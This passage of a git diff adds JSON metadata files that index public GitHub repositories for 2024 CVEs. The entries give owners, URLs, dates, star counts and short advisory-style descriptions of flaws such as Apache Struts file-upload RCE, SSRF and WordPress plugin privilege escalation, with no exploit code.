"CyberPanel authenticated RCE < 2.3.8", + "fork": false, + "created_at": "2024-12-15T22:40:52Z", + "updated_at": "2025-01-07T14:20:46Z", + "pushed_at": "2024-12-19T09:36:58Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-53476.json b/2024/CVE-2024-53476.json new file mode 100644 index 0000000000..200c3f5c9b --- /dev/null +++ b/2024/CVE-2024-53476.json @@ -0,0 +1,33 @@ +[ + { + "id": 906000848, + "name": "CVE-2024-53476", + "full_name": "AbdullahAlmutawa\/CVE-2024-53476", + "owner": { + "login": "AbdullahAlmutawa", + "id": 53648024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53648024?v=4", + "html_url": "https:\/\/github.com\/AbdullahAlmutawa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbdullahAlmutawa\/CVE-2024-53476", + "description": "SimplCommerce is affected by a race condition vulnerability in the checkout logic, allowing multiple users to purchase more products than are in stock via simultaneous checkout requests.", + "fork": false, + "created_at": "2024-12-20T00:27:22Z", + "updated_at": "2025-01-02T20:59:27Z", + "pushed_at": "2025-01-02T20:59:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-53522.json b/2024/CVE-2024-53522.json new file mode 100644 index 0000000000..1ebc1ed8b7 --- /dev/null +++ b/2024/CVE-2024-53522.json @@ -0,0 +1,33 @@ +[ + { + "id": 911020987, + "name": "CVE-2024-53522", + "full_name": "Safecloudth\/CVE-2024-53522", + "owner": { + "login": "Safecloudth", + "id": 192949182, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/192949182?v=4", + "html_url": "https:\/\/github.com\/Safecloudth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Safecloudth\/CVE-2024-53522", + "description": "PoC for CVE-2024-53522 affecting HOSxP XE 4", + "fork": false, + "created_at": "2025-01-02T04:13:37Z", + "updated_at": "2025-01-07T13:06:08Z", + "pushed_at": "2025-01-02T04:16:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5356.json b/2024/CVE-2024-5356.json new file mode 100644 index 0000000000..825f7434fa --- /dev/null +++ b/2024/CVE-2024-5356.json @@ -0,0 +1,33 @@ +[ + { + "id": 856122118, + "name": "Aj-Report-sql-CVE-2024-5356-POC", + "full_name": "droyuu\/Aj-Report-sql-CVE-2024-5356-POC", + "owner": { + "login": "droyuu", + "id": 164647533, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164647533?v=4", + "html_url": "https:\/\/github.com\/droyuu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/droyuu\/Aj-Report-sql-CVE-2024-5356-POC", + "description": null, + "fork": false, + "created_at": "2024-09-12T03:02:20Z", + "updated_at": "2024-09-20T02:47:37Z", + "pushed_at": "2024-09-12T03:20:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-53617.json b/2024/CVE-2024-53617.json new file mode 100644 index 0000000000..feb02e3f36 --- /dev/null +++ b/2024/CVE-2024-53617.json @@ -0,0 +1,33 @@ +[ + { + "id": 896176114, + "name": "CVE-2024-53617", + "full_name": "ii5mai1\/CVE-2024-53617", + "owner": { + "login": "ii5mai1", + "id": 129608769, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129608769?v=4", + "html_url": "https:\/\/github.com\/ii5mai1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ii5mai1\/CVE-2024-53617", + "description": null, + "fork": false, + "created_at": "2024-11-29T17:50:07Z", + "updated_at": "2024-11-29T17:56:56Z", + "pushed_at": "2024-11-29T17:56:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-53677.json b/2024/CVE-2024-53677.json new file mode 100644 index 0000000000..8bfa95d345 --- /dev/null +++ b/2024/CVE-2024-53677.json @@ -0,0 +1,312 @@ +[ + { + "id": 902266041, + "name": "s2-067-CVE-2024-53677", + "full_name": "cloudwafs\/s2-067-CVE-2024-53677", + "owner": { + "login": "cloudwafs", + "id": 27655248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27655248?v=4", + "html_url": "https:\/\/github.com\/cloudwafs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cloudwafs\/s2-067-CVE-2024-53677", + "description": "s2-067(CVE-2024-53677)", + "fork": false, + "created_at": "2024-12-12T08:30:14Z", + "updated_at": "2024-12-31T02:36:33Z", + "pushed_at": "2024-12-17T10:37:17Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 902994077, + "name": "CVE-2024-53677-S2-067", + "full_name": "TAM-K592\/CVE-2024-53677-S2-067", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-53677-S2-067", + "description": "A critical vulnerability, CVE-2024-53677, has been identified in the popular Apache Struts framework, potentially allowing attackers to execute arbitrary code remotely. This vulnerability arises from flaws in the file upload logic, which can be exploited to perform path traversal and malicious file uploads.", + "fork": false, + "created_at": "2024-12-13T17:42:55Z", + "updated_at": "2025-01-07T16:09:03Z", + "pushed_at": "2024-12-20T10:05:15Z", + "stargazers_count": 82, + "watchers_count": 82, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 82, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 904496445, + "name": "CVE-2024-53677", + "full_name": "yangyanglo\/CVE-2024-53677", + "owner": { + "login": "yangyanglo", + "id": 65865031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65865031?v=4", + "html_url": "https:\/\/github.com\/yangyanglo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yangyanglo\/CVE-2024-53677", + "description": null, + "fork": false, + "created_at": "2024-12-17T02:22:38Z", + "updated_at": "2024-12-27T06:12:11Z", + "pushed_at": "2024-12-17T08:52:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 904573736, + "name": "CVE-2024-53677-Docker", + "full_name": "c4oocO\/CVE-2024-53677-Docker", + "owner": { + "login": "c4oocO", + "id": 124355329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124355329?v=4", + "html_url": "https:\/\/github.com\/c4oocO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c4oocO\/CVE-2024-53677-Docker", + "description": "A Docker-based environment to reproduce the CVE-2024-53677 vulnerability in Apache Struts 2. ", + "fork": false, + "created_at": "2024-12-17T06:42:16Z", + "updated_at": "2024-12-20T15:57:49Z", + "pushed_at": "2024-12-17T07:01:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 905018620, + "name": "CVE-2024-53677-S2-067", + "full_name": "XiaomingX\/CVE-2024-53677-S2-067", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/CVE-2024-53677-S2-067", + "description": "A critical vulnerability, CVE-2024-53677, has been identified in the popular Apache Struts framework, potentially allowing attackers to execute arbitrary code remotely. This vulnerability arises from flaws in the file upload logic, which can be exploited to perform path traversal and malicious file uploads.", + "fork": false, + "created_at": "2024-12-18T02:03:56Z", + "updated_at": "2024-12-24T04:04:41Z", + "pushed_at": "2024-12-18T02:08:09Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 905399741, + "name": "CVE-2024-53677-S2-067-thread", + "full_name": "dustblessnotdust\/CVE-2024-53677-S2-067-thread", + "owner": { + "login": "dustblessnotdust", + "id": 185211671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185211671?v=4", + "html_url": "https:\/\/github.com\/dustblessnotdust", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dustblessnotdust\/CVE-2024-53677-S2-067-thread", + "description": null, + "fork": false, + "created_at": "2024-12-18T18:42:34Z", + "updated_at": "2024-12-21T17:37:04Z", + "pushed_at": "2024-12-18T19:10:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 907413237, + "name": "CVE-2024-53677", + "full_name": "0xdeviner\/CVE-2024-53677", + "owner": { + "login": "0xdeviner", + "id": 61959752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61959752?v=4", + "html_url": "https:\/\/github.com\/0xdeviner", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xdeviner\/CVE-2024-53677", + "description": null, + "fork": false, + "created_at": "2024-12-23T14:22:44Z", + "updated_at": "2024-12-23T14:27:54Z", + "pushed_at": "2024-12-23T14:27:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 907464165, + "name": "VM-CVE-2024-53677", + "full_name": "Q0LT\/VM-CVE-2024-53677", + "owner": { + "login": "Q0LT", + "id": 155090912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155090912?v=4", + "html_url": "https:\/\/github.com\/Q0LT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Q0LT\/VM-CVE-2024-53677", + "description": "Struts Vulnerability - CVE-2024-53677", + "fork": false, + "created_at": "2024-12-23T16:32:59Z", + "updated_at": "2024-12-23T17:31:35Z", + "pushed_at": "2024-12-23T17:31:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 911433822, + "name": "CVE-2024-53677", + "full_name": "EQSTLab\/CVE-2024-53677", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-53677", + "description": "Proof-of-Concept for CVE-2024-46538", + "fork": false, + "created_at": "2025-01-03T02:30:53Z", + "updated_at": "2025-01-06T10:20:48Z", + "pushed_at": "2025-01-03T18:51:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 913279213, + "name": "struts_cve-2024-53677", + "full_name": "0xPThree\/struts_cve-2024-53677", + "owner": { + "login": "0xPThree", + "id": 108757172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108757172?v=4", + "html_url": "https:\/\/github.com\/0xPThree", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xPThree\/struts_cve-2024-53677", + "description": null, + "fork": false, + "created_at": "2025-01-07T11:27:09Z", + "updated_at": "2025-01-07T11:39:37Z", + "pushed_at": "2025-01-07T11:39:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-54152.json b/2024/CVE-2024-54152.json new file mode 100644 index 0000000000..25ff2ff733 --- /dev/null +++ b/2024/CVE-2024-54152.json @@ -0,0 +1,33 @@ +[ + { + "id": 909882750, + "name": "CVE-2024-54152-poc", + "full_name": "math-x-io\/CVE-2024-54152-poc", + "owner": { + "login": "math-x-io", + "id": 97481289, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97481289?v=4", + "html_url": "https:\/\/github.com\/math-x-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/math-x-io\/CVE-2024-54152-poc", + "description": null, + "fork": false, + "created_at": "2024-12-30T01:07:48Z", + "updated_at": "2025-01-07T07:57:18Z", + "pushed_at": "2024-12-30T01:08:00Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5420.json b/2024/CVE-2024-5420.json new file mode 100644 index 0000000000..87ed615f3b --- /dev/null +++ b/2024/CVE-2024-5420.json @@ -0,0 +1,64 @@ +[ + { + "id": 851185555, + "name": "CVE-2024-5420-XSS", + "full_name": "gh-ost00\/CVE-2024-5420-XSS", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-5420-XSS", + "description": "SEH utnserver Pro\/ProMAX \/ INU-100 20.1.22 - XSS ", + "fork": false, + "created_at": "2024-09-02T15:29:22Z", + "updated_at": "2024-09-23T12:29:44Z", + "pushed_at": "2024-09-02T15:38:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851215428, + "name": "CVE-2024-5420_XSS", + "full_name": "K4yd0\/CVE-2024-5420_XSS", + "owner": { + "login": "K4yd0", + "id": 79024172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79024172?v=4", + "html_url": "https:\/\/github.com\/K4yd0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K4yd0\/CVE-2024-5420_XSS", + "description": null, + "fork": false, + "created_at": "2024-09-02T16:39:59Z", + "updated_at": "2024-09-02T17:52:09Z", + "pushed_at": "2024-09-02T17:52:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-54262.json b/2024/CVE-2024-54262.json new file mode 100644 index 0000000000..ba28f4ba51 --- /dev/null +++ b/2024/CVE-2024-54262.json @@ -0,0 +1,33 @@ +[ + { + "id": 905797737, + "name": "CVE-2024-54262", + "full_name": "RandomRobbieBF\/CVE-2024-54262", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-54262", + "description": "Import Export For WooCommerce <= 1.5 - Authenticated (Subscriber+) Arbitrary File Upload", + "fork": false, + "created_at": "2024-12-19T14:42:06Z", + "updated_at": "2024-12-19T16:52:15Z", + "pushed_at": "2024-12-19T14:43:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-54330.json b/2024/CVE-2024-54330.json new file mode 100644 index 0000000000..07a41b33ff --- /dev/null +++ b/2024/CVE-2024-54330.json @@ -0,0 +1,33 @@ +[ + { + "id": 911139468, + "name": "CVE-2024-54330", + "full_name": "RandomRobbieBF\/CVE-2024-54330", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-54330", + "description": "Hurrakify <= 2.4 - Unauthenticated Server-Side Request Forgery", + "fork": false, + "created_at": "2025-01-02T10:31:51Z", + "updated_at": "2025-01-03T15:42:04Z", + "pushed_at": "2025-01-02T10:32:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-54363.json b/2024/CVE-2024-54363.json new file mode 100644 index 0000000000..6141c5a013 --- /dev/null +++ b/2024/CVE-2024-54363.json @@ -0,0 +1,33 @@ +[ + { + "id": 911232019, + "name": "CVE-2024-54363", + "full_name": "RandomRobbieBF\/CVE-2024-54363", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-54363", + "description": "Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation", + "fork": false, + "created_at": "2025-01-02T14:41:52Z", + "updated_at": "2025-01-06T13:24:39Z", + "pushed_at": "2025-01-02T14:42:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-54369.json b/2024/CVE-2024-54369.json new file mode 100644 index 0000000000..492736e16a --- /dev/null +++ b/2024/CVE-2024-54369.json @@ -0,0 +1,33 @@ +[ + { + "id": 905823638, + "name": "CVE-2024-54369", + "full_name": "RandomRobbieBF\/CVE-2024-54369", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-54369", + "description": "Zita Site Builder <= 1.0.2 - Missing Authorization to Arbitrary Plugin Installation", + "fork": false, + "created_at": "2024-12-19T15:38:41Z", + "updated_at": "2025-01-06T09:23:39Z", + "pushed_at": "2024-12-19T15:39:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-54374.json b/2024/CVE-2024-54374.json new file mode 100644 index 0000000000..e3527e4941 --- /dev/null +++ b/2024/CVE-2024-54374.json @@ -0,0 +1,33 @@ +[ + { + "id": 911563924, + "name": "CVE-2024-54374", + "full_name": "RandomRobbieBF\/CVE-2024-54374", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-54374", + "description": "Sogrid <= 1.5.6 - Unauthenticated Local File Inclusion", + "fork": false, + "created_at": "2025-01-03T10:08:54Z", + "updated_at": "2025-01-06T13:24:00Z", + "pushed_at": "2025-01-03T10:09:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-54378.json b/2024/CVE-2024-54378.json new file mode 100644 index 0000000000..f952d47798 --- /dev/null +++ b/2024/CVE-2024-54378.json @@ -0,0 +1,33 @@ +[ + { + "id": 905865153, + "name": "CVE-2024-54378", + "full_name": "RandomRobbieBF\/CVE-2024-54378", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-54378", + "description": "Quietly Insights <= 1.2.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update", + "fork": false, + "created_at": "2024-12-19T17:15:17Z", + "updated_at": "2025-01-06T13:17:55Z", + "pushed_at": "2024-12-19T17:16:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-54385.json b/2024/CVE-2024-54385.json new file mode 100644 index 0000000000..659ffb9258 --- /dev/null +++ b/2024/CVE-2024-54385.json @@ -0,0 +1,33 @@ +[ + { + "id": 911208038, + "name": "CVE-2024-54385", + "full_name": "RandomRobbieBF\/CVE-2024-54385", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-54385", + "description": "Radio Player <= 2.0.82 - Blind Unauthenticated Server-Side Request Forgery", + "fork": false, + "created_at": "2025-01-02T13:40:14Z", + "updated_at": "2025-01-06T13:25:23Z", + "pushed_at": "2025-01-02T13:40:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5452.json b/2024/CVE-2024-5452.json new file mode 100644 index 0000000000..42e805ee96 --- /dev/null +++ b/2024/CVE-2024-5452.json @@ -0,0 +1,33 @@ +[ + { + "id": 892465914, + "name": "cve-2024-5452-poc", + "full_name": "XiaomingX\/cve-2024-5452-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-5452-poc", + "description": "此漏洞的根本原因是**深度差异库(deepdiff)**在反序列化用户输入时,未正确处理双下划线(dunder)属性。 PyTorch Lightning 使用 deepdiff.Delta 对象根据前端操作修改应用状态,设计目标是仅允许特定状态变量的修改。", + "fork": false, + "created_at": "2024-11-22T06:56:12Z", + "updated_at": "2024-12-08T18:37:31Z", + "pushed_at": "2024-11-22T06:56:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-54679.json b/2024/CVE-2024-54679.json new file mode 100644 index 0000000000..e1636e8d84 --- /dev/null +++ b/2024/CVE-2024-54679.json @@ -0,0 +1,33 @@ +[ + { + "id": 899369634, + "name": "CVE-2024-54679", + "full_name": "hotplugin0x01\/CVE-2024-54679", + "owner": { + "login": "hotplugin0x01", + "id": 57496383, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57496383?v=4", + "html_url": "https:\/\/github.com\/hotplugin0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hotplugin0x01\/CVE-2024-54679", + "description": "CVE-2024-54679 - CyberPanel (aka Cyber Panel) Denial of Service (https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-54679)", + "fork": false, + "created_at": "2024-12-06T06:02:34Z", + "updated_at": "2024-12-19T20:35:12Z", + "pushed_at": "2024-12-06T06:19:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-54819.json b/2024/CVE-2024-54819.json new file mode 100644 index 0000000000..022d714f91 --- /dev/null +++ b/2024/CVE-2024-54819.json @@ -0,0 +1,36 @@ +[ + { + "id": 910297086, + "name": "CVE-2024-54819", + "full_name": "partywavesec\/CVE-2024-54819", + "owner": { + "login": "partywavesec", + "id": 98420665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98420665?v=4", + "html_url": "https:\/\/github.com\/partywavesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/partywavesec\/CVE-2024-54819", + "description": "CVE-2024-54819", + "fork": false, + "created_at": "2024-12-30T23:06:22Z", + "updated_at": "2025-01-02T12:55:32Z", + "pushed_at": "2024-12-30T23:18:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-54819", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-54910.json b/2024/CVE-2024-54910.json new file mode 100644 index 0000000000..9cffe3cd67 --- /dev/null +++ b/2024/CVE-2024-54910.json @@ -0,0 +1,33 @@ +[ + { + "id": 913463488, + "name": "CVE-2024-54910", + "full_name": "KrakenEU\/CVE-2024-54910", + "owner": { + "login": "KrakenEU", + "id": 80364768, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80364768?v=4", + "html_url": "https:\/\/github.com\/KrakenEU", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KrakenEU\/CVE-2024-54910", + "description": null, + "fork": false, + "created_at": "2025-01-07T18:24:46Z", + "updated_at": "2025-01-07T18:33:21Z", + "pushed_at": "2025-01-07T18:33:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55099.json b/2024/CVE-2024-55099.json new file mode 100644 index 0000000000..6c2a2531ff --- /dev/null +++ b/2024/CVE-2024-55099.json @@ -0,0 +1,33 @@ +[ + { + "id": 901509181, + "name": "CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-", + "full_name": 